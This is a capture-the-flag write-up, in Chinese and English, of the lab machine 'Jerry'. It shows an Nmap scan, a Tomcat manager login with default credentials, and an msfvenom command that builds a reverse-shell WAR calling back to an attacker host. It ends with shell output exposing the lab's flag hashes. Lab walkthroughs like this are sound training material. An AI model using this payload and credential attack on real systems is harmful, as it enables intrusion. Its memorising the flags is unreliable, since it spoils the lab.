本文介绍了针对名为“Jerry”的靶机的渗透测试过程。使用Nmap工具扫描目标IP,发现8080端口开放,运行Apache Tomcat。通过默认凭据“tomcat:s3cret”登录应用管理器,上传WAR文件以获取shell。最终,在Windows系统上成功获取用户和根目录下的flag,分别为user.txt和root.txt,包含相应的哈希值。 This article details the penetration testing process for a target machine named "Jerry." Using the Nmap tool to scan the target IP revealed that port 8080 was open, running Apache Tomcat. By logging into the application manager with the default credentials "tomcat:s3cret", a WAR file was uploaded to obtain a shell. Ultimately, on the Windows system, the user and root flags were successfully obtained, which are user.txt and root.txt, containing the corresponding hashes.

Information Gathering

# Nmap 7.98 scan initiated Sat Dec 27 06:19:34 2025 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.10.10.95
Nmap scan report for 10.10.10.95
Host is up (0.12s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache-Coyote/1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/7.0.88
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012|2008|7 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows Server 2012 R2 (97%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (89%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.008 days (since Sat Dec 27 06:09:14 2025)
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: Incremental

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec 27 06:20:16 2025 -- 1 IP address (1 host up) scanned in 41.97 seconds

默认凭据tomcat:s3cret登陆上应用管理器

上传WAR文件即可获取shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.3 LPORT=4444 -f war -o shell.war

C:\Users\Administrator\Desktop\flags>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 0834-6C04

 Directory of C:\Users\Administrator\Desktop\flags

06/19/2018  06:09 AM    <DIR>          .
06/19/2018  06:09 AM    <DIR>          ..
06/19/2018  06:11 AM                88 2 for the price of 1.txt
               1 File(s)             88 bytes
               2 Dir(s)   2,418,716,672 bytes free

C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt"
type "2 for the price of 1.txt"
user.txt
7004dbcef0f854e0fb401875f26ebd00

root.txt
04a8b36e1545a455393d067e772fe90e

Information Gathering

# Nmap 7.98 scan initiated Sat Dec 27 06:19:34 2025 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.10.10.95
Nmap scan report for 10.10.10.95
Host is up (0.12s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache-Coyote/1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/7.0.88
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012|2008|7 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows Server 2012 R2 (97%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (89%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.008 days (since Sat Dec 27 06:09:14 2025)
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: Incremental

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec 27 06:20:16 2025 -- 1 IP address (1 host up) scanned in 41.97 seconds

Log in to the application manager with default credentials tomcat:s3cret

Uploading a WAR file will grant a shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.3 LPORT=4444 -f war -o shell.war

C:\Users\Administrator\Desktop\flags>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 0834-6C04

 Directory of C:\Users\Administrator\Desktop\flags

06/19/2018  06:09 AM    <DIR>          .
06/19/2018  06:09 AM    <DIR>          ..
06/19/2018  06:11 AM                88 2 for the price of 1.txt
               1 File(s)             88 bytes
               2 Dir(s)   2,418,716,672 bytes free

C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt"
type "2 for the price of 1.txt"
user.txt
7004dbcef0f854e0fb401875f26ebd00

root.txt
04a8b36e1545a455393d067e772fe90e